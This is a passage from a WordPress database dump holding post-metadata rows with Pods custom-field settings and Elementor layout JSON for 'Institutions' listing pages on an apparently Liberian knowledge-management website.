File'),(6337,576,'file_wp_gallery_output','0'),(6338,576,'file_wp_gallery_link','post'),(6339,576,'file_wp_gallery_columns','1'),(6340,576,'file_wp_gallery_random_sort','0'),(6341,576,'file_wp_gallery_size','thumbnail'),(6342,576,'oembed_width','0'),(6343,576,'oembed_height','0'),(6344,576,'oembed_show_preview','0'),(6345,576,'oembed_restrict_providers','0'),(6346,576,'oembed_enabled_providers_amazoncn','0'),(6347,576,'oembed_enabled_providers_amazoncouk','0'),(6348,576,'oembed_enabled_providers_amazoncom','0'),(6349,576,'oembed_enabled_providers_amazoncomau','0'),(6350,576,'oembed_enabled_providers_amazonin','0'),(6351,576,'oembed_enabled_providers_animotocom','0'),(6352,576,'oembed_enabled_providers_cloudupcom','0'),(6353,576,'oembed_enabled_providers_collegehumorcom','0'),(6354,576,'oembed_enabled_providers_crowdsignalcom','0'),(6355,576,'oembed_enabled_providers_dailymotioncom','0'),(6356,576,'oembed_enabled_providers_facebookcom','0'),(6357,576,'oembed_enabled_providers_flickrcom','0'),(6358,576,'oembed_enabled_providers_hulucom','0'),(6359,576,'oembed_enabled_providers_imgurcom','0'),(6360,576,'oembed_enabled_providers_instagramcom','0'),(6361,576,'oembed_enabled_providers_issuucom','0'),(6362,576,'oembed_enabled_providers_kickstartercom','0'),(6363,576,'oembed_enabled_providers_meetupcom','0'),(6364,576,'oembed_enabled_providers_mixcloudcom','0'),(6365,576,'oembed_enabled_providers_redditcom','0'),(6366,576,'oembed_enabled_providers_reverbnationcom','0'),(6367,576,'oembed_enabled_providers_screencastcom','0'),(6368,576,'oembed_enabled_providers_scribdcom','0'),(6369,576,'oembed_enabled_providers_slidesharenet','0'),(6370,576,'oembed_enabled_providers_smugmugcom','0'),(6371,576,'oembed_enabled_providers_someecardscom','0'),(6372,576,'oembed_enabled_providers_soundcloudcom','0'),(6373,576,'oembed_enabled_providers_speakerdeckcom','0'),(6374,576,'oembed_enabled_providers_spotifycom','0'),(6375,576,'oembed_enabled_providers_tedcom','0'),(6376,576,'oembed_enabled_providers_tumblrcom','0'),(6377,576,'oembed_enabled_providers_twittercom','0'),(6378,576,'oembed_enabled_providers_vimeocom','0'),(6379,576,'oembed_enabled_providers_wordpresscom','0'),(6380,576,'oembed_enabled_providers_wordpresstv','0'),(6381,576,'oembed_enabled_providers_youtubecom','0'),(6382,576,'pick_format_type','single'),(6383,576,'pick_format_single','dropdown'),(6384,576,'pick_format_multi','checkbox'),(6385,576,'pick_allow_add_new','1'),(6386,576,'pick_taggable','0'),(6387,576,'pick_show_icon','1'),(6388,576,'pick_show_edit_link','1'),(6389,576,'pick_show_view_link','1'),(6390,576,'pick_limit','0'),(6391,576,'pick_user_role','a:0:{}'),(6392,576,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(6393,576,'boolean_format_type','checkbox'),(6394,576,'boolean_yes_label','Yes'),(6395,576,'boolean_no_label','No'),(6396,576,'admin_only','0'),(6397,576,'restrict_role','0'),(6398,576,'restrict_capability','0'),(6399,576,'hidden','0'),(6400,576,'read_only','0'),(6401,576,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(6402,576,'rest_read','0'),(6403,576,'rest_write','0'),(6404,576,'rest_pick_response','array'),(6405,576,'rest_pick_depth','2'),(6407,576,'unique','0'),(6408,578,'_elementor_controls_usage','a:0:{}'),(6409,578,'type','website'),(6410,578,'required','0'),(6411,578,'text_allow_shortcode','0'),(6412,578,'text_allow_html','0'),(6413,578,'text_allowed_html_tags','strong em a ul ol li b i'),(6414,578,'text_max_length','255'),(6415,578,'website_format','normal'),(6416,578,'website_allow_port','0'),(6417,578,'website_clickable','0'),(6418,578,'website_new_window','0'),(6419,578,'website_max_length','255'),(6420,578,'website_html5','0'),(6421,578,'phone_format','999-999-9999 x999'),(6422,578,'phone_enable_phone_extension','1'),(6423,578,'phone_max_length','25'),(6424,578,'phone_html5','0'),(6425,578,'email_max_length','255'),(6426,578,'email_html5','0'),(6427,578,'password_max_length','255'),(6428,578,'paragraph_allow_html','1'),(6429,578,'paragraph_oembed','0'),(6430,578,'paragraph_wptexturize','1'),(6431,578,'paragraph_convert_chars','1'),(6432,578,'paragraph_wpautop','1'),(6433,578,'paragraph_allow_shortcode','0'),(6434,578,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(6435,578,'paragraph_max_length','0'),(6436,578,'wysiwyg_editor','tinymce'),(6437,578,'wysiwyg_media_buttons','1'),(6438,578,'wysiwyg_oembed','0'),(6439,578,'wysiwyg_wptexturize','1'),(6440,578,'wysiwyg_convert_chars','1'),(6441,578,'wysiwyg_wpautop','1'),(6442,578,'wysiwyg_allow_shortcode','1'),(6443,578,'code_allow_shortcode','0'),(6444,578,'code_max_length','0'),(6445,578,'datetime_type','format'),(6446,578,'datetime_format','mdy'),(6447,578,'datetime_time_type','12'),(6448,578,'datetime_time_format','h_mma'),(6449,578,'datetime_time_format_24','hh_mm'),(6450,578,'datetime_allow_empty','1'),(6451,578,'datetime_html5','0'),(6452,578,'date_type','format'),(6453,578,'date_format','mdy'),(6454,578,'date_allow_empty','1'),(6455,578,'date_html5','0'),(6456,578,'time_type','12'),(6457,578,'time_format','h_mma'),(6458,578,'time_format_24','hh_mm'),(6459,578,'time_allow_empty','1'),(6460,578,'time_html5','0'),(6461,578,'number_format_type','number'),(6462,578,'number_format','i18n'),(6463,578,'number_decimals','0'),(6464,578,'number_format_soft','0'),(6465,578,'number_step','1'),(6466,578,'number_min','0'),(6467,578,'number_max','100'),(6468,578,'number_max_length','12'),(6469,578,'currency_format_type','number'),(6470,578,'currency_format_sign','usd'),(6471,578,'currency_format_placement','before'),(6472,578,'currency_format','i18n'),(6473,578,'currency_decimals','2'),(6474,578,'currency_decimal_handling','none'),(6475,578,'currency_step','1'),(6476,578,'currency_min','0'),(6477,578,'currency_max','1000'),(6478,578,'currency_max_length','12'),(6479,578,'file_format_type','single'),(6480,578,'file_uploader','attachment'),(6481,578,'file_attachment_tab','upload'),(6482,578,'file_edit_title','1'),(6483,578,'file_show_edit_link','0'),(6484,578,'file_linked','0'),(6485,578,'file_limit','0'),(6486,578,'file_restrict_filesize','10MB'),(6487,578,'file_type','images'),(6488,578,'file_field_template','rows'),(6489,578,'file_add_button','Add File'),(6490,578,'file_modal_title','Attach a file'),(6491,578,'file_modal_add_button','Add File'),(6492,578,'file_wp_gallery_output','0'),(6493,578,'file_wp_gallery_link','post'),(6494,578,'file_wp_gallery_columns','1'),(6495,578,'file_wp_gallery_random_sort','0'),(6496,578,'file_wp_gallery_size','thumbnail'),(6497,578,'oembed_width','0'),(6498,578,'oembed_height','0'),(6499,578,'oembed_show_preview','0'),(6500,578,'oembed_restrict_providers','0'),(6501,578,'oembed_enabled_providers_amazoncn','0'),(6502,578,'oembed_enabled_providers_amazoncouk','0'),(6503,578,'oembed_enabled_providers_amazoncom','0'),(6504,578,'oembed_enabled_providers_amazoncomau','0'),(6505,578,'oembed_enabled_providers_amazonin','0'),(6506,578,'oembed_enabled_providers_animotocom','0'),(6507,578,'oembed_enabled_providers_cloudupcom','0'),(6508,578,'oembed_enabled_providers_collegehumorcom','0'),(6509,578,'oembed_enabled_providers_crowdsignalcom','0'),(6510,578,'oembed_enabled_providers_dailymotioncom','0'),(6511,578,'oembed_enabled_providers_facebookcom','0'),(6512,578,'oembed_enabled_providers_flickrcom','0'),(6513,578,'oembed_enabled_providers_hulucom','0'),(6514,578,'oembed_enabled_providers_imgurcom','0'),(6515,578,'oembed_enabled_providers_instagramcom','0'),(6516,578,'oembed_enabled_providers_issuucom','0'),(6517,578,'oembed_enabled_providers_kickstartercom','0'),(6518,578,'oembed_enabled_providers_meetupcom','0'),(6519,578,'oembed_enabled_providers_mixcloudcom','0'),(6520,578,'oembed_enabled_providers_redditcom','0'),(6521,578,'oembed_enabled_providers_reverbnationcom','0'),(6522,578,'oembed_enabled_providers_screencastcom','0'),(6523,578,'oembed_enabled_providers_scribdcom','0'),(6524,578,'oembed_enabled_providers_slidesharenet','0'),(6525,578,'oembed_enabled_providers_smugmugcom','0'),(6526,578,'oembed_enabled_providers_someecardscom','0'),(6527,578,'oembed_enabled_providers_soundcloudcom','0'),(6528,578,'oembed_enabled_providers_speakerdeckcom','0'),(6529,578,'oembed_enabled_providers_spotifycom','0'),(6530,578,'oembed_enabled_providers_tedcom','0'),(6531,578,'oembed_enabled_providers_tumblrcom','0'),(6532,578,'oembed_enabled_providers_twittercom','0'),(6533,578,'oembed_enabled_providers_vimeocom','0'),(6534,578,'oembed_enabled_providers_wordpresscom','0'),(6535,578,'oembed_enabled_providers_wordpresstv','0'),(6536,578,'oembed_enabled_providers_youtubecom','0'),(6537,578,'pick_format_type','single'),(6538,578,'pick_format_single','dropdown'),(6539,578,'pick_format_multi','checkbox'),(6540,578,'pick_allow_add_new','1'),(6541,578,'pick_taggable','0'),(6542,578,'pick_show_icon','1'),(6543,578,'pick_show_edit_link','1'),(6544,578,'pick_show_view_link','1'),(6545,578,'pick_limit','0'),(6546,578,'pick_user_role','a:0:{}'),(6547,578,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(6548,578,'boolean_format_type','checkbox'),(6549,578,'boolean_yes_label','Yes'),(6550,578,'boolean_no_label','No'),(6551,578,'admin_only','0'),(6552,578,'restrict_role','0'),(6553,578,'restrict_capability','0'),(6554,578,'hidden','0'),(6555,578,'read_only','0'),(6556,578,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(6557,578,'rest_read','0'),(6558,578,'rest_write','0'),(6559,578,'rest_pick_response','array'),(6560,578,'rest_pick_depth','2'),(6562,570,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/liberia-nbsap-v2-en.pdf'),(6563,570,'_pods_cover_image','a:1:{i:0;i:573;}'),(6567,578,'unique','0'),(6568,578,'wysiwyg_repeatable','0'),(8158,89,'ofc_enable_fullscreen','disable'),(8159,89,'ofc_fullscreen_nav','enable'),(8160,89,'ofc_fullscreen_nav_pos','right'),(8161,89,'osh_disable_topbar_sticky','default'),(8162,89,'osh_disable_header_sticky','default'),(8163,89,'osh_sticky_header_style','default'),(8164,89,'_elementor_edit_mode','builder'),(8165,89,'_elementor_template_type','wp-page'),(8166,89,'_elementor_version','3.4.0'),(8167,89,'_wp_page_template','default'),(8168,89,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"fb437a8\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(8169,702,'_elementor_controls_usage','a:0:{}'),(8170,702,'_elementor_edit_mode','builder'),(8171,702,'_elementor_template_type','wp-page'),(8172,702,'_elementor_version','2.7.5'),(8173,702,'_wp_page_template','default'),(8174,702,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8184,704,'_elementor_edit_mode','builder'),(8185,704,'_elementor_template_type','wp-page'),(8186,704,'_elementor_version','2.7.5'),(8187,704,'_wp_page_template','default'),(8188,704,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8192,705,'_elementor_edit_mode','builder'),(8193,705,'_elementor_template_type','wp-page'),(8194,705,'_elementor_version','2.7.5'),(8195,705,'_wp_page_template','default'),(8196,705,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.85)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#000000\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8205,707,'_elementor_edit_mode','builder'),(8206,707,'_elementor_template_type','wp-page'),(8207,707,'_elementor_version','2.7.5'),(8208,707,'_wp_page_template','default'),(8209,707,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.85)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#000000\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8219,709,'_elementor_edit_mode','builder'),(8220,709,'_elementor_template_type','wp-page'),(8221,709,'_elementor_version','2.7.5'),(8222,709,'_wp_page_template','default'),(8223,709,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read 